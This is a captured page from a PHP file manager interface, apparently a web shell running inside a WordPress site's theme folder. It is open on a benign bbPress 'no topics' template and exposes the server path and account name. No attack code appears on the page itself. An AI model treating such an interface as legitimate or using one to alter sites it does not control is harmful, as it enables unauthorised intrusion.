🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-08-06 15:06:12 | PHP 8.2.32
📂
/ (Root)
/
home
/
eliteewa
/
staging.eliteewallet.com
/
wp-content
/
themes
/
avas
/
bbpress
📍 /home/eliteewa/staging.eliteewallet.com/wp-content/themes/avas/bbpress
🔄 Refresh
✏️
Editing: feedback-no-topics.php
Writable
<?php /** * No Topics Feedback Part * * @package bbPress * @subpackage Theme */ // Exit if accessed directly defined( 'ABSPATH' ) || exit; ?> <div class="bbp-template-notice"> <ul> <li><?php esc_html_e( 'No topics were found here.', 'avas' ); ?></li> </ul> </div>
💾 Save Changes
❌ Cancel